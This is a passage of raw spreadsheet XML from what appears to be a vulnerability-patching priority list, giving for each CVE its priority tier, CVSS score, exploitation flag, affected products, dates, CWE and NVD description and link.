      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F6" s="5" t="n">
        <v>0.955</v>
      </c>
      <c r="G6" s="5" t="inlineStr">
        <is>
          <t>red hat, ubuntu</t>
        </is>
      </c>
      <c r="H6" s="5" t="inlineStr">
        <is>
          <t>synacor:zimbra_collaboration_suite</t>
        </is>
      </c>
      <c r="I6" s="5" t="inlineStr">
        <is>
          <t>2022-09-26</t>
        </is>
      </c>
      <c r="J6" s="5" t="inlineStr">
        <is>
          <t>2022-11-10</t>
        </is>
      </c>
      <c r="K6" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L6" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Zimbra Collaboration (ZCS) 8.8.15 and 9.0. An attacker can upload arbitrary files through amavis via a cpio loophole (extraction to /opt/zimbra/jetty/webapps/zimbra/public) that can lead to incorrect access to any other user accounts. Zimbra recommends pax over cpio. Also, pax is in the prerequisites of Zimbra on Ubuntu; however, pax is no longer part of a default Red Hat installation after RHEL 6 (or CentOS 6). Once pax is installed, amavis automatically prefers it over cpio.</t>
        </is>
      </c>
      <c r="M6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-41352</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-25249</t>
        </is>
      </c>
      <c r="C7" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D7" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F7" s="5" t="n">
        <v>0.017</v>
      </c>
      <c r="G7" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="H7" s="5" t="inlineStr">
        <is>
          <t>fortinet:fortios, fortinet:fortisase, fortinet:fortiswitchmanager, siemens:ruggedcom_ape1808, siemens:ruggedcom_ape1808_firmware</t>
        </is>
      </c>
      <c r="I7" s="5" t="inlineStr">
        <is>
          <t>2026-01-13</t>
        </is>
      </c>
      <c r="J7" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="K7" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="L7" s="5" t="inlineStr">
        <is>
          <t>A heap-based buffer overflow vulnerability in Fortinet FortiOS 7.6.0 through 7.6.3, FortiOS 7.4.0 through 7.4.8, FortiOS 7.2.0 through 7.2.11, FortiOS 7.0.0 through 7.0.17, FortiOS 6.4 all versions, FortiSwitchManager 7.2.0 through 7.2.6, FortiSwitchManager 7.0.0 through 7.0.5 allows attacker to execute unauthorized code or commands via specially crafted packets</t>
        </is>
      </c>
      <c r="M7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-25249</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-14733</t>
        </is>
      </c>
      <c r="C8" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D8" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F8" s="5" t="n">
        <v>0.265</v>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="inlineStr">
        <is>
          <t>watchguard:firebox_m270, watchguard:firebox_m290, watchguard:firebox_m295, watchguard:firebox_m370, watchguard:firebox_m390, watchguard:firebox_m395, watchguard:firebox_m440, watchguard:firebox_m4600, watchguard:firebox_m470, watchguard:firebox_m4800</t>
        </is>
      </c>
      <c r="I8" s="5" t="inlineStr">
        <is>
          <t>2025-12-19</t>
        </is>
      </c>
      <c r="J8" s="5" t="inlineStr">
        <is>
          <t>2025-12-26</t>
        </is>
      </c>
      <c r="K8" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L8" s="5" t="inlineStr">
        <is>
          <t>An Out-of-bounds Write vulnerability in the WatchGuard Fireware OS iked process may allow a remote unauthenticated attacker to execute arbitrary code. This vulnerability affects both the mobile user VPN with IKEv2 and the branch office VPN using IKEv2 when configured with a dynamic gateway peer.
If the Firebox was previously configured with the mobile user VPN with IKEv2 or a branch office VPN using IKEv2 to a dynamic gateway peer, and both of those configurations have since been deleted, that Firebox may still be vulnerable if a branch office VPN to a static gateway peer is still configured.</t>
        </is>
      </c>
      <c r="M8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-14733</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-67038</t>
        </is>
      </c>
      <c r="C9" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D9" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F9" s="5" t="n">
        <v>0.193</v>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="inlineStr">
        <is>
          <t>lantronix:e213f102s, lantronix:e213f102s_firmware, lantronix:e214f002s, lantronix:e214f002s_firmware, lantronix:e214f00cs, lantronix:e214f00cs_firmware, lantronix:e214g000s, lantronix:e214g000s_firmware, lantronix:e214g001s, lantronix:e214g001s_firmware</t>
        </is>
      </c>
      <c r="I9" s="5" t="inlineStr">
        <is>
          <t>2026-03-11</t>
        </is>
      </c>
      <c r="J9" s="5" t="inlineStr">
        <is>
          <t>2026-06-26</t>
        </is>
      </c>
      <c r="K9" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L9" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Lantronix EDS5000 2.1.0.0R3. The HTTP RPC module executes a shell command to write logs when user's authentication fails. The username is directly concatenated with the command without any sanitization. This allow attackers to inject arbitrary OS commands into the username parameter. Injected commands are executed with root privileges.</t>
        </is>
      </c>
      <c r="M9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-67038</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19490</t>
        </is>
      </c>
      <c r="C10" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D10" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F10" s="5" t="n">
        <v>0.06</v>
      </c>
      <c r="G10" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="H10" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler_application_delivery_controller, citrix:netscaler_gateway</t>
        </is>
      </c>
      <c r="I10" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J10" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="K10" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L10" s="5" t="inlineStr">
        <is>
          <t>Vulnerability in NetScaler ADC and NetScaler Gateway.
This issue affects ADC: from 14.1 through 73.32 and from 13.1 through 63.21; Gateway: from 14.1 through 73.32 and from 13.1 through 63.21.</t>
        </is>
      </c>
      <c r="M10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19490</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86060</t>
        </is>
      </c>
      <c r="C11" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D11" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F11" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="inlineStr">
        <is>
          <t>mikrotik:routeros</t>
        </is>
      </c>
      <c r="I11" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J11" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="K11" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="L11"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M11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86060</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67277</t>
        </is>
      </c>
      <c r="C12" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D12" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F12" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="inlineStr">
        <is>
          <t>mikrotik:routeros</t>
        </is>
      </c>
      <c r="I12" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J12" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="K12" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L12"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M12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67277</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85046</t>
        </is>
      </c>
      <c r="C13" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D13" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F13" s="5" t="n">
        <v>0.013</v>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="inlineStr">
        <is>
          <t>google:chrome, google:v8</t>
        </is>
      </c>
      <c r="I13" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J13" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="K13" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L13" s="5" t="inlineStr">
        <is>
          <t>Type confusion in V8 in Google Chrome prior to 152.0.7977.82 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85046</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87491</t>
        </is>
      </c>
      <c r="C14" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D14" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F14" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I14" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J14" s="5" t="inlineStr">
        <is>
          <t>2026-09-23</t>
        </is>
      </c>
      <c r="K14" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L14" s="5" t="inlineStr">
        <is>
          <t>Out of bounds write in V8 in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87491</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>CVE-2016-7255</t>
        </is>
      </c>
      <c r="C15" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D15" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F15" s="5" t="n">
        <v>0.8100000000000001</v>
      </c>
      <c r="G15" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H15" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1507, microsoft:windows_10_1511, microsoft:windows_10_1607, microsoft:windows_7, microsoft:windows_8.1, microsoft:windows_rt_8.1, microsoft:windows_server_2008, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_vista</t>
        </is>
      </c>
      <c r="I15" s="5" t="inlineStr">
        <is>
          <t>2016-11-10</t>
        </is>
      </c>
      <c r="J15" s="5" t="inlineStr">
        <is>
          <t>2022-05-03</t>
        </is>
      </c>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr">
        <is>
          <t>The kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, and 1607, and Windows Server 2016 allow local users to gain privileges via a crafted application, aka "Win32k Elevation of Privilege Vulnerability."</t>
        </is>
      </c>
      <c r="M15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2016-7255</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-37969</t>
        </is>
      </c>
      <c r="C16" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D16" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F16" s="5" t="n">
        <v>0.283</v>
      </c>
      <c r="G16" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H16" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1507, microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_10_20h2, microsoft:windows_10_21h1, microsoft:windows_10_21h2, microsoft:windows_11_21h2, microsoft:windows_7, microsoft:windows_8.1, microsoft:windows_rt_8.1</t>
        </is>
      </c>
      <c r="I16" s="5" t="inlineStr">
        <is>
          <t>2022-09-13</t>
        </is>
      </c>
      <c r="J16" s="5" t="inlineStr">
        <is>
          <t>2022-10-05</t>
        </is>
      </c>
      <c r="K16" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L16" s="5" t="inlineStr">
        <is>
          <t>Windows Common Log File System Driver Elevation of Privilege Vulnerability</t>
        </is>
      </c>
      <c r="M16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-37969</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-38352</t>
        </is>
      </c>
      <c r="C17" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D17" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F17" s="5" t="n">
        <v>0.013</v>
      </c>
      <c r="G17" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H17" s="5" t="inlineStr">
        <is>
          <t>debian:debian_linux, linux:linux_kernel</t>
        </is>
      </c>
      <c r="I17" s="5" t="inlineStr">
        <is>
          <t>2025-07-22</t>
        </is>
      </c>
      <c r="J17" s="5" t="inlineStr">
        <is>
          <t>2025-09-25</t>
        </is>
      </c>
      <c r="K17" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L17" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
posix-cpu-timers: fix race between handle_posix_cpu_timers() and posix_cpu_timer_del()
If an exiting non-autoreaping task has already passed exit_notify() and
calls handle_posix_cpu_timers() from IRQ, it can be reaped by its parent
or debugger right after unlock_task_sighand().
If a concurrent posix_cpu_timer_del() runs at that moment, it won't be
able to detect timer-&gt;it.cpu.firing != 0: cpu_timer_task_rcu() and/or
lock_task_sighand() will fail.
Add the tsk-&gt;exit_state check into run_posix_cpu_timers() to fix this.
This fix is not needed if CONFIG_POSIX_CPU_TIMERS_TASK_WORK=y, because
exit_task_work() is called before exit_notify(). But the check still
makes sense, task_work_add(&amp;tsk-&gt;posix_cputimers_work.work) will fail
anyway in this case.</t>
        </is>
      </c>
      <c r="M17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-38352</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-31431</t>
        </is>
      </c>
      <c r="C18" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D18" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F18" s="5" t="n">
        <v>0.999</v>
      </c>
      <c r="G18" s="5" t="inlineStr">
        <is>
          <t>linux kernel, ubuntu</t>
        </is>
      </c>
      <c r="H18" s="5" t="inlineStr">
        <is>
          <t>amazon:amazon_linux, arista:cloudvision_agni, arista:cloudvision_portal, arista:netvisor_os, arista:velocloud_edge, arista:velocloud_gateway, arista:velocloud_orchestrator, canonical:ubuntu_linux, debian:debian_linux, linux:linux_kernel</t>
        </is>
      </c>
      <c r="I18" s="5" t="inlineStr">
        <is>
          <t>2026-04-22</t>
        </is>
      </c>
      <c r="J18" s="5" t="inlineStr">
        <is>
          <t>2026-05-15</t>
        </is>
      </c>
      <c r="K18" s="5" t="inlineStr">
        <is>
          <t>CWE-1288, CWE-669</t>
        </is>
      </c>
      <c r="L18" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
crypto: algif_aead - Revert to operating out-of-place
This mostly reverts commit 72548b093ee3 except for the copying of
the associated data.
There is no benefit in operating in-place in algif_aead since the
source and destination come from different mappings.  Get rid of
all the complexity added for in-place operation and just copy the
AD directly.</t>
        </is>
      </c>
      <c r="M18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-31431</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81963</t>
        </is>
      </c>
      <c r="C19" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D19" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F19" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G19" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H19" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I19" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J19" s="5" t="inlineStr">
        <is>
          <t>2026-09-22</t>
        </is>
      </c>
      <c r="K19" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-59</t>
        </is>
      </c>
      <c r="L19" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Update Stack allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81963</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85880</t>
        </is>
      </c>
      <c r="C20" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D20" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="F20" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G20" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H20" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022</t>
        </is>
      </c>
      <c r="I20" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J20" s="5" t="inlineStr">
        <is>
          <t>2026-09-22</t>
        </is>
      </c>
      <c r="K20" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-908</t>
        </is>
      </c>
      <c r="L20" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows ALPC allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85880</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>CVE-2020-14498</t>
        </is>
      </c>
      <c r="C21" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D21" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E21" s="5" t="inlineStr"/>
      <c r="F21" s="5" t="n">
        <v>0.029</v>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="inlineStr">
        <is>
          <t>hms-networks:ecatcher</t>
        </is>
      </c>
      <c r="I21" s="5" t="inlineStr">
        <is>
          <t>2020-08-26</t>
        </is>
      </c>
      <c r="J21" s="5" t="inlineStr"/>
      <c r="K21" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-787</t>
        </is>
      </c>
      <c r="L21" s="5" t="inlineStr">
        <is>
          <t>HMS Industrial Networks AB eCatcher all versions prior to 6.5.5 is vulnerable to a stack-based buffer overflow, which may allow an attacker to remotely execute arbitrary code.</t>
        </is>
      </c>
      <c r="M21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2020-14498</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14560</t>
        </is>
      </c>
      <c r="C22" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D22" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E22" s="5" t="inlineStr"/>
      <c r="F22" s="5" t="inlineStr"/>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="inlineStr"/>
      <c r="I22" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J22" s="5" t="inlineStr"/>
      <c r="K22" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L22" s="5" t="inlineStr">
        <is>
          <t>The teddy-bear-customize-addon WordPress plugin through 1.0.5 does not properly validate uploaded files, relying on a client-supplied content type and preserving the original filename, allowing unauthenticated attackers to upload arbitrary PHP files and execute code on the server.</t>
        </is>
      </c>
      <c r="M22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14560</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19188</t>
        </is>
      </c>
      <c r="C23" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D23" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E23" s="5" t="inlineStr"/>
      <c r="F23" s="5" t="n">
        <v>0.019</v>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="inlineStr"/>
      <c r="I23" s="5" t="inlineStr">
        <is>
          <t>2026-08-14</t>
        </is>
      </c>
      <c r="J23" s="5" t="inlineStr"/>
      <c r="K23" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L23" s="5" t="inlineStr">
        <is>
          <t>A critical OS command injection vulnerability has been identified in the
 Haiwell IoT Cloud HMI Gateway product. The vulnerability exists in the 
Net Check feature accessible via the /setting endpoint. The cmdPing 
Socket.io event fails to properly sanitize user-supplied input before 
passing it to the underlying operating system, allowing an attacker to 
inject and execute arbitrary OS commands with root privileges.</t>
        </is>
      </c>
      <c r="M23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19188</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28659</t>
        </is>
      </c>
      <c r="C24" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D24" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E24" s="5" t="inlineStr"/>
      <c r="F24" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="inlineStr"/>
      <c r="I24" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J24" s="5" t="inlineStr"/>
      <c r="K24" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L24" s="5" t="inlineStr">
        <is>
          <t>In MicroXR Blobstore, there is a possible way to access other app's files due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28659</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42043</t>
        </is>
      </c>
      <c r="C25" s="5" t="n">
        <v>10</v>
      </c>
      <c r="D25" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E25" s="5" t="inlineStr"/>
      <c r="F25" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G25" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H25" s="5" t="inlineStr">
        <is>
          <t>axios:axios</t>
        </is>
      </c>
      <c r="I25" s="5" t="inlineStr">
        <is>
          <t>2026-04-24</t>
        </is>
      </c>
      <c r="J25" s="5" t="inlineStr"/>
      <c r="K25" s="5" t="inlineStr">
        <is>
          <t>CWE-183, CWE-441, CWE-918</t>
        </is>
      </c>
      <c r="L25" s="5" t="inlineStr">
        <is>
